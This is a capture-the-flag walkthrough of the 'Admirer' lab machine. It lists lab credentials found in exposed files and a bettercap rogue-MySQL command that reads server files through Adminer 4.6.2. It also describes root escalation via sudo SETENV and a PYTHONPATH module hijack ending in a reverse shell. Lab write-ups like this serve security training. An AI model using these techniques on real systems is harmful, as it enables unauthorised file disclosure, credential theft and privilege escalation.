Basic information

Port scan

Ports 21, 22 and 80 are open:

80

From the scan results, robots.txt reveals an admin-dir directory; requesting it directly returns 403:

Brute-force the directory. The wordlist matters here: credentials.txt, the file that holds the sensitive information, is not in most default wordlists:

credentials.txt

[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!

FTP

Log in to FTP with the credentials obtained; two files are found:

index.php

Download the source archive and extract it. index.php contains database credentials, but the database is not exposed on an external port:

$servername = "localhost";
$username = "waldo";
$password = "]F7jLHw:*G>UPrTo}~A\"d6b";   // the double quote inside the value is backslash-escaped in the PHP source
$dbname = "admirerdb";

utility-scripts/admin-task.php

It runs a script according to the submitted task id. The id is compared against the fixed list 1-7 before being interpolated into shell_exec, and the comments note that tasks 4-7 need root:

<?php
// Web Interface to the admin_tasks script
//
if(isset($_REQUEST['task']))
{
    $task = $_REQUEST['task'];
    if($task == '1' || $task == '2' || $task == '3' || $task == '4' ||
       $task == '5' || $task == '6' || $task == '7')
    {
        /***********************************************************************************
        Available options:
        1) View system uptime
        2) View logged in users
        3) View crontab (current user only)
        4) Backup passwd file (not working)
        5) Backup shadow file (not working)
        6) Backup web data (not working)
        7) Backup database (not working)

        NOTE: Options 4-7 are currently NOT working because they need root privileges.
        I'm leaving them in the valid tasks in case I figure out a way
        to securely run code as root from a PHP page.
        ************************************************************************************/
        echo str_replace("\n", "<br />", shell_exec("/opt/scripts/admin_tasks.sh $task 2>&1"));
    }
}
?>

utility-scripts/db-admin.php

It also holds database credentials:

<?php
$servername = "localhost";
$username = "waldo";
$password = "Wh3r3_1s_w4ld0?";

// Create connection
$conn = new mysqli($servername, $username, $password);

// Check connection
if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
}
echo "Connected successfully";


// TODO: Finish implementing this or find a better open source alternative
?>

The TODO comment is a hint. Requesting http://10.10.10.187/utility-scripts/db_admin.php directly returns 404, which suggests the author did find a "better open source alternative". The box name, Admirer, points at Adminer (originally named phpMinAdmin), a single-file PHP database manager:

adminer.php

But none of the credentials found so far let us log in. Keep looking and pay attention to the version: it is Adminer 4.6.2, which has a known vulnerability:

MySQL client file read

It is really just LOAD DATA LOCAL INFILE turned around: we run our own MySQL server and point the client at it (Adminer's login form lets us choose which server to connect to). The rogue server answers the client's first query with a request to send a local file, and a client with local infile enabled obeys, so the server can read any file the PHP process can. bettercap's mysql.server module does this out of the box. Since we already know index.php holds a password, read index.php directly (the path is relative to the PHP script's working directory):

sudo bettercap -iface utun2 -eval "set mysql.server.infile ../index.php; mysql.server on"
$servername = "localhost";
$username = "waldo";
$password = "&<h5b~yK3F#{PaPB&dA}{H>";
$dbname = "admirerdb";

user flag

These credentials work for SSH login, which gives user.txt:

Privilege escalation information

sudo -l shows the script can be run as root, and SETENV means we can pass environment variables through sudo:

(ALL) SETENV: /opt/scripts/admin_tasks.sh

In admin_tasks.sh:

backup_web()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Running backup script in the background, it might take a while..."
        /opt/scripts/backup.py &
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}

This function runs backup.py from the same directory, which uses make_archive from shutil. Because we have SETENV, we can write a malicious module with a function of the same name and set the environment variable that controls where Python looks for modules, PYTHONPATH, so our copy is imported first:

Privilege escalation

Set the environment variable, run the script with sudo, and the malicious function is triggered:

root flag

Catch the reverse shell and read root.txt:

References